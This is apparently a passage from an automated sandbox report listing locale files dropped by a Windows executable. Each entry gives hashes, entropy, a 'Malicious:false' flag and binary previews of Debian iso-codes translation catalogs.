                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3776 messages, Project-Id-Version: iso_3166-2 'Regiunea Karas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):229998
                                                                                                    Entropy (8bit):5.418910603868275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Aacjzmv07+ydmrSYuVAdkSS+Wlxp9EthsE:WCyC/F4lc2E
                                                                                                    MD5:8B4877C25E9CAA4B0784B01BF8103FD2
                                                                                                    SHA1:C8058BB86F9C787F31E810E1E6279F4E7F4FDD2D
                                                                                                    SHA-256:D802481530EB80A37865F3A4EA97D298C62ED717AD879DFA98D381DB909EC191
                                                                                                    SHA-512:6A24CB96B526C0AA6CB71F3FE187DFD406BD7D46F7D8E846DB0E9DC681A3F03CEFE80AAA45771FAD52C352FE13B50C7CEF732ADB0605FE68F14A140C80E2E2E2
                                                                                                    Malicious:false
                                                                                                    Preview:.................v...............:.......:.......:.......:.......;.......;.......;......);......7;......<;......D;......M;......R;......Z;......z;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<......!<......1<......7<......A<......P<......a<......p<......v<......|<.......<.......<.......<..+....<.......<.......<.......<.......<.......<.......<.......<.......=...... =......6=......D=......N=......X=......b=......o=......|=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......)>......;>......P>......d>......p>......}>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?......)?......1?......@?......L?......V?......a?......u?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@.......@.......@......&@......;@......B@......K@......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Teritoriul britanic din Antarctica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2987
                                                                                                    Entropy (8bit):5.246656991476706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3KpkxDvxI+vGqIfdvqN5CoU55+XgxsXNnw1GiMiQkchDvQ:rLvKpkxD6+yaCo65+XmobvQ
                                                                                                    MD5:887D533B6C368E63C82707ECBA32D7C1
                                                                                                    SHA1:1034CAD13A6D2A1485ED24228A67905B760C6F02
                                                                                                    SHA-256:E9AB7A6833615B93C97FD16EDFC27C486F254EB03BC7DC5935ACB9B00F3086BD
                                                                                                    SHA-512:F44255BD97C0BD48BB28C413D46D31FDDE66DCE0669A3801234E261767A7FE9F4EF50A6EB22F2AB8896C244F427BEF015CB276E4AC9F0A3A6A2780D2DECAAA02
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............?......."...-...+...P...+...|...........0...................................$.......<...*...k...........................................................A... .......b.......x...................+......./...........................;...%...G...-...m................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unitatea de cont ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9977
                                                                                                    Entropy (8bit):5.012751164981623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:b/SHUqFWL1HOyYwLFNF9a7LG3K+aceTNWtKMJtg/2S2SILCDrteyKm65cXR5BdgY:fqFqxJB6VRyK0G/2LCntxH/dgNnF6n
                                                                                                    MD5:926B866614AA585822A4C43CD108EA77
                                                                                                    SHA1:D67644E0CDBBFAAAB1DF8144FFDB10F0DAA76E56
                                                                                                    SHA-256:B8BDCD3E752DEF0A6D3DA366D7DF93AD28EEC4AD63504C53AAED022062E88820
                                                                                                    SHA-512:9B2CE5486FB3CF5D02D1B631DBFC8A6C2D7AD8F79B7F02313AEAB7C1A120B4D232B10BE4A1F1EC3376B11DB6AE2EACC30F070B5C9EC0C735EF43B207CB3A19E5
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 247 messages, Project-Id-Version: iso_639-3 'Abhaz\304\203'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10854
                                                                                                    Entropy (8bit):4.922939236586581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:01ZqUzHem7ppDDB0VM7zl5BfCbwLscGMPFMBl5t1ZHfXe9V1eoi/vdVQYTCxMllm:KgKem1pDt0VSzl5BfCbwLsoFMX5f5EV1
                                                                                                    MD5:B37E51DEF4DC168234D44FDB26825B58
                                                                                                    SHA1:05897AEEE3B2AA29CA3E6EF7FD277DB211FFFF7C
                                                                                                    SHA-256:3F7431C5326AA942C89EF58AF1BAB6E7168932EAEF10EDAAB2A006100F380070
                                                                                                    SHA-512:0A22B2ACC2E911A669EC9E383AB981EACAE1F0285CDAB1671210F3491872A3AEAEE9C54DAAE89A1A0BFFBEA897AD24CD04E113088DAB3E5697005AC29B5DCF86
                                                                                                    Malicious:false
                                                                                                    Preview:....................K........................................................................................................................... .......(......./.......6.......B.......J.......R.......Z.......a.......l.......u.......{.......................................................................................................................................................".......+.......4.......:.......A.......H.......Q.......W.......^.......d...............................................................................................................................&.......*.......1.......P.......k.......q.......t.......z...................#...................................................................$.......-.......4.......?.......G.......Q.......V.......`.......d.......i.......o...:...z.......................................................................................(.......8.......A.......K.......P.......W.......`.......l.......q.......w.......~...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Limbi afro-asiatice'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10650
                                                                                                    Entropy (8bit):5.065371944842179
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxytSE0BfNcaXCl2Tpin1NCzxlcYYpeo:XXE0BfNcaXQ2Tpi1NCzjcNH
                                                                                                    MD5:3F155815D3C2159D7521A3F8B13C4009
                                                                                                    SHA1:0CA293209B6B14C80017EF396BFCE44DB789E74E
                                                                                                    SHA-256:1ACD35FDB2EFEED56093A60738131DA3C630C7117340E7A08A4E23E22CDA9B3A
                                                                                                    SHA-512:BF15877641244E2DA9CF60D87D1A19FDC472DD3F52C192E0A2FF3B85F310D366269F8EAE7CEB8B80E51A1C7EA8518A38A32242A257E619DB63D03EBBFDC7FA14
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................#.......7.......f...*...u.../...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1779
                                                                                                    Entropy (8bit):5.348068384248708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:LFYnJl14lk/2rlaTxIEpwt9yUrzFeTV3QAf+g:LFo4PYTojyGzQprfZ
                                                                                                    MD5:CE4A6305951F4D4DEDA1580AF799231B
                                                                                                    SHA1:73886F2EE82834B35FBFF2D7536EBB93E4A52F0A
                                                                                                    SHA-256:F008983EAE1B4AEC81106AC9B0B626801E4EF819F500EE88881D19D9EC8EFF7D
                                                                                                    SHA-512:217A32C3E86A0190E1A2477B944F22064C8BD31A03371D1F5391EB45BC6A747AD756FD10ED8F45209DFFC952FEEA1DF146DCA894A15AF4B75449FDEA663D6D65
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......m.......u.......}.......................................................................................................................................................%...............7.......?.......X.......0.......E.......T.......c.......x.......................................................................................+.......:.......K.......V.......e.......z...................................1............................................................................................................................................................Afghanistan.Armenia.Austria.Azerbaijan.Belarus.Bulgaria.Croatia.France.Germany.Hungary.Japan.Kazakhstan.Kyrgyzstan.Latvia.Lithuania.Moldova.Mongolia.Montenegro.Poland.Portugal.Romania.Saint Lucia.Slovakia.Thailand.Ukraine.United States of America.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-03-07 17:40
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274\321\201\320\272\320\260\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12713
                                                                                                    Entropy (8bit):5.301835531920759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:G95MXg4WjVDxa5hW8IGq0aWfXMtBum6pv:GBDxa5IHzi
                                                                                                    MD5:44CC6FB2AD8509E3284C0FE22419E505
                                                                                                    SHA1:C29B93CEA12B40D4F97E8399700D6CEFFC5EC1AD
                                                                                                    SHA-256:0F99E121B66A647562174A3B5822088727ADA347D74BCE92ECAF0A0A7637D6B3
                                                                                                    SHA-512:D5657811985C924A2D9C9A897E59AAAB62B6457B77A32FBB63B3E62A6FCBF55C2B6B740D04042BCD2F8715A4FB4FC24EF64FDFE0FE74FBFBF5C9064CE4AC12A3
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29823
                                                                                                    Entropy (8bit):5.27116183031551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:sxZbOhzmotmsWP4XWAIbOKnjp9QcTOy0rbMPBS:4h0z9m1jYcSYBS
                                                                                                    MD5:BCFEC9576539E6AAFBD4E590264B876F
                                                                                                    SHA1:24556257531D07CAB1EF840A3031AC94C91AD5F8
                                                                                                    SHA-256:F6993AAD4C6913B23DEA6D77E0F521A4CB1AD1A41D3F27A98E713DC5FBB44208
                                                                                                    SHA-512:5373D9C111A90EC09E69F2B2F7FB1B81C27DE1E634D27857396FEE796151EAC6EF01CEA075563779E95C312D17902EC532965323A80E20827233D22AE734156C
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1938 messages, Project-Id-Version: iso_3166-2 '\320\220\321\200\320\263\320\260\321\203'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105964
                                                                                                    Entropy (8bit):5.370308057559235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:NJ4BLZFL4oPvpjQOD1z7CbsEy3uVkq8A4c2F7:PaZVxMbt8u3f4fF
                                                                                                    MD5:D317995157844C1E073B1FADD8910308
                                                                                                    SHA1:BEEC1330F62767C417389156C371A432778B2BA6
                                                                                                    SHA-256:23E47100B308766946A6655034EA20F2426B27E82E1AF16A0FE3618B9478E38E
                                                                                                    SHA-512:8AB00335BA9851DFFBC3602918240586C20248C5424C9A74790E2AFDC28794751178DCDC33271769789C5F77265A86E0CD92D90081606975F7133C0249371E5D
                                                                                                    Malicious:false
                                                                                                    Preview:.................<......<y.................................................................................................$.......*.......>.......H.......L...+...R.......~....................................................................................................'.......3.......H.......R.......\.......g.......o.......y.................................................................................................................(.......8.......P.......].......o.......~..................................................................................................'.......8.......?.......K.......R.......\.......c.......z..........................................................................................................".......*.......3.......;.......@.......I.......\.......j.......x.................................................................................................................................2.......=.......S.......\.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260\321\217 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\265\321\201\320\272\320\260\321\217 \320\242\320\265\321\200\321\200\320\270\321\202\320\276\321\200\320\270\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3480
                                                                                                    Entropy (8bit):5.51689300235304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADffO3WvGqIfdvqNuoUohi1hAyjSSgOoMwJcNvyl8ZOSQJsPPcsD+BO:qDfJyBoV2NjK3aW8FQKPPc4f
                                                                                                    MD5:C5099117343800B94B66FB93808F7B52
                                                                                                    SHA1:D82B5D40DAB0DC2CBDF45B6DD1234D25D3AEAEF1
                                                                                                    SHA-256:AA0D0B4A10360D16B416C79E703CC0C33D0AA9E4912A3C8DB652468147FB3DCF
                                                                                                    SHA-512:FAD8645006DB1D6D34000A08D5CDE1C6383212802BD6F8E5EDB088E5AB52567E3BB0B7E72AC2FAAF7D8BB8E2C42DBD599DEFC9AE7738D1B478548F5AFD8D0C04
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................F.......S......._...'...1.......P..............."...........<...#...Z...D...~...V.......H.......-...c...................>...................*...S...D...*.......$.......................B.......O...R...0.......B...............O...*.......z........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 '\320\240\320\260\321\201\321\207\321\221\321\202\320\275\320\260\321\217 \320\265\320\264\320\270\320\275\320\270\321\206\320\260 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11510
                                                                                                    Entropy (8bit):5.257521890276472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmoRsrHn9Vo9vdgjCnMLCkLQPynkTStxPNisJxZAFWYCIYbch2YbkdqYbBC:TIDmHdVwvdgmn2DL5zj0zP/n
                                                                                                    MD5:4135A574E9F7D79BADD19C22B3E687EE
                                                                                                    SHA1:DE4A5E0EC8C6BFF63D79D203DE1079B28D504D42
                                                                                                    SHA-256:2A8D6C92507D78BEAB4DC84E7C38728A3BF9A7545F5A18DDF6AF472602802F80
                                                                                                    SHA-512:B1EE05985EAA217A249E1AECDBBAD048921362D87C5E40E21F5044142B6BB7E308793B08046CAD88B1947E286E1EB19056E6295683581A468180E97A0EAB5092
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 360 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\321\205\320\260\320\267\321\201\320\272\320\270\320\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18412
                                                                                                    Entropy (8bit):5.02517194774641
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bQvvKBmeBHBs6SjqwetoEA65ArtFMVIhOfFMz7QicuuwtY4+x0C:cvvKV9AHGkcjwt5C
                                                                                                    MD5:E105C9DC891D76E408DE582A1174C264
                                                                                                    SHA1:F698556B4C9DF366E2E602664D6ECE6C6EBF417D
                                                                                                    SHA-256:0518CD78793DF7F099AFF9F27E00E3BF46A6EF436B0DD85B346474E1BFCF37EE
                                                                                                    SHA-512:2CC4DC701EE4B56463E371C245B667FF5B979F4904CDC5FED2CF1EEA8083027C4927004A576389C2A3B77B984201BDAB2F81E4B3313BECC13830D4C87D1BCD1D
                                                                                                    Malicious:false
                                                                                                    Preview:........h.......\...............8.......9.......C.......S.......\.......b.......j.......o.......x...............................................................................................................%.......,.......A.......J.......X.......a.......h.......p.......w.......~........................................................................................................................................ ....... ....... ....... ......" ......* ......2 ......; ......D ......L ......U ......^ ......f ......n ......} ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......!!......'!......0!......?!......O!......T!......g!......n!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......!"......,"......2"......<"......C"......I"......b"......x"......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\260\320\267\320\270\320\271\321\201\320\272\320\270\320\265 \321\217\320\267\321\213\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9598
                                                                                                    Entropy (8bit):5.157111986645613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxlM83SE0BfNcagM2kRl4xdwbNCXmk/fDBHx5qmn9Axp7FbjTcR3dlaWDFfRJn:XKE0BfNcafJL/qRjwns
                                                                                                    MD5:718EBB18B91806C2C4EC46B2286BA062
                                                                                                    SHA1:EC81C668F0B0A1EA9CFAD1D90147364C3333F270
                                                                                                    SHA-256:C4F4244E1DF67FEDBDD76F7491550B9194FAA91C5C7A42F97C0FEEFE52EFC8A9
                                                                                                    SHA-512:221FB9B88B19410103F4A0F462F7D371BE213E300947BF9E0B53312079D2CC6D4BA06B922981086ABABF1FD30CC0FD900067E5DE893F1356BCF08E93ADAE581F
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................".......!...7...#...Y.......}...........#...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 384 messages, Project-Id-Version: iso_3166-1 'Afuganisita'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21974
                                                                                                    Entropy (8bit):4.986818192704099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xK3pyvsDFs6jQEqCEKEuEWrXpV8BmbjEb8fP4XGCA07uVatGsLC6BI2OVzU9baZV:xK3pNjQQEu3D78IQb8fP4XGCA0nGsLlu
                                                                                                    MD5:F65CA866AF62D31683684A6BE4CF0667
                                                                                                    SHA1:C60107D4F18C70CB5EB192778AFAC3DAA33430B4
                                                                                                    SHA-256:D1D7D4B55D3AFB8F0BAC5329B906F490AC6F9A5CCD70FF08189FCFD27507BA4B
                                                                                                    SHA-512:D5A2AD1DC9306E50BD20D65C21B1C574756A51740F8A76CA9CA123153162EAE5270A849C51103115366235BA45D99813EEF49FC0296B0D92D2B455988BBEF30B
                                                                                                    Malicious:false
                                                                                                    Preview:................................@ ......A ......M ......U ......] ......l ......t ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......&!.......!......6!......=!......C!......K!.. ...R!......s!......{!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......("....../"......>"......W"......\"......b"......h"......y"......."......."......."..,....".......".......#..%....#......0#......=#......H#......P#......U#......\#......k#..%...z#..,....#.."....#..*....#.......$......#$......,$......5$......H$......d$......l$......r$......~$.......$.......$.......$.......$.......$..'....$.......$.......%......3%......R%......p%......u%......}%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......(&....../&......9&......A&......L&......Q&......[&......b&......p&......w&......}&..!....&.......&.......&.......&.......&..0....&....../'......7'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3 messages, Project-Id-Version: iso_3166-3 'Antiye za nederilande'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):560
                                                                                                    Entropy (8bit):5.143941100811469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCATp/2QvKBxjt02Uk/+W/ckI5m5XmBQWi2a:/ATp/85t0UW69I5iXmq
                                                                                                    MD5:9A49E81427E734E32597BA0E21C47CB0
                                                                                                    SHA1:D791595189AFAAFADC9B13FBB25A142B92A71949
                                                                                                    SHA-256:9FC36A2DE61EA6C2BBD43459838AEEBCFE684215FCDFF359E7ABEDD908A615D9
                                                                                                    SHA-512:70CDA4CEE883E10D9FCA64DEC3A80581E9993516026BD8E70C3AD2E502A532189F4DC77215DA3E330A322B4605723D48D7DDDE916A333D17103690E514AF6DEB
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......`.......a.......v...u............................................Netherlands Antilles.Serbia and Montenegro.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-11-01 15:00+0200.Last-Translator: Steve Murphy <murf@e-tools.com>.Language-Team: Kinyarwanda <translation-team-rw@lists.sourceforge.net>.Language: rw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Antiye za nederilande.Seribiya na Montenegoro.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 83 messages, Project-Id-Version: iso_4217 'Afugani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4998
                                                                                                    Entropy (8bit):4.886448229283162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:H7FZ4bzIwztnwnh7v9oi4YE5MmR01tgjKuc10U4DX:SUcwlSd9dR4gjRJLX
                                                                                                    MD5:313EBA3CDF985AD9594CDE71433E5747
                                                                                                    SHA1:E38705562B8E812C75B9370FC67771DDFCEC86C1
                                                                                                    SHA-256:A77695524F29E96A746C7761D1BBBF37EDC705B5CE6523B29E6D31E12A0B50DF
                                                                                                    SHA-512:004E01CB39816431CC86DA1872DD0FECE0CE9596D17E88BEB289F80F48ABEFC9656205B336030505436373A9A4D208C818D0D3B50C7948E0A14343988B3E31D9
                                                                                                    Malicious:false
                                                                                                    Preview:........S...........q...L...............................(.......7.......E.......W.......g.......v...............................................................................................!.......7.......D.......S.......e.......p.......}.......................................................................................................+.......8.......E.......Q.......a.......q...............................................................................................................A.......R.......b.......q.......{...............................................................................................&.......4.......@.......M.......h.......w...........................s...................'.......=.......Q.......g...............................................................................1.......F.......Y.......k.......x.......................................................................1.......D.......X.......s.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 329 messages, Project-Id-Version: iso_639-3 'Abukaziyani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14237
                                                                                                    Entropy (8bit):4.704850835080162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:x+iD5Wi4QsVKejMqLxMQOuFhY/3FMrL98kF6fB+lhPV:37kVMwOf5Q
                                                                                                    MD5:15AB52F62EFC610DC73D8A0DBA5E953A
                                                                                                    SHA1:1CE347B46C5CA268470ABC2B90D3926E0C46FDBE
                                                                                                    SHA-256:B72EDD502559B6A8618A95640BC1457E36C1A5715B8F0651353E2452B06982DE
                                                                                                    SHA-512:8ED7BFC042A5207C350743A45424265A069FBF1253EC47665177343762633E1476E473C85054020461A312664C19D287FC109B3C2F000D1C45B6CC14E6B83D24
                                                                                                    Malicious:false
                                                                                                    Preview:........I.......d............................................................................................................................................................................... .......(......./.......6.......B.......K.......S.......[.......c.......j.......o.......z...............................................................................................................................................................................&.......5.......?.......G.......O.......V.......^.......g.......l.......r.......{.......................................................................................................................................................".......+......./.......6.......<.......D.......K.......S.......W.......^.......g.......m.......p.......v.......{...............................................................................................................................................&.......,.......4.......:.......D.......I.......N.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10473
                                                                                                    Entropy (8bit):5.09871265434849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dVw6xZacWh28ltU4WjV9qWxa5hW8zLdpa+kY4B9LfhV:7/xZ4hXg4WjVDxa5hW8zLdY+knzhV
                                                                                                    MD5:266C97A2DAC0555DB8091D26F33D0070
                                                                                                    SHA1:498BCF24A33D647F98AC35220F9AA16487FA5754
                                                                                                    SHA-256:A6E12AE62307D034B2FCFA0F7F3A66D4C265C6009248AFFA2CB5F7F8FED878B7
                                                                                                    SHA-512:84F88134BA2ADE99295FACC69878B73D2859D694F632F37AFDF0A1572F1DEA9AB8C565E8A5A9B92A8A0E996253D3C737AF70851D0424BC808CCF7C4342072F76
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afgh\303\240nistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24430
                                                                                                    Entropy (8bit):5.065442674899881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosbM/aCjjamV46nbjz5wsWP48WAINiZGdTca9mUpkBAKjMqNDmmSc:0oNaqa248fmsWP48WAIMOmUWAKjJRz
                                                                                                    MD5:869C936B43179BA6307219435DEDFF41
                                                                                                    SHA1:DDC068EFA1C0CE3CE3995A3C0384F2833079178D
                                                                                                    SHA-256:6BEE4DB0FF77389CC0A2671732E8409A6505386CFD3F2297A0C84162D1ECB58C
                                                                                                    SHA-512:D04A72B9D0954A960B4FBE8D8DC9B69CAB21B8C153D5C3C9A2C17D5CBCCD694B62E2A623C318D5F24B09D91CD7E88A315787153ECF8BDF06FF8D8D0D31B78535
                                                                                                    Malicious:false
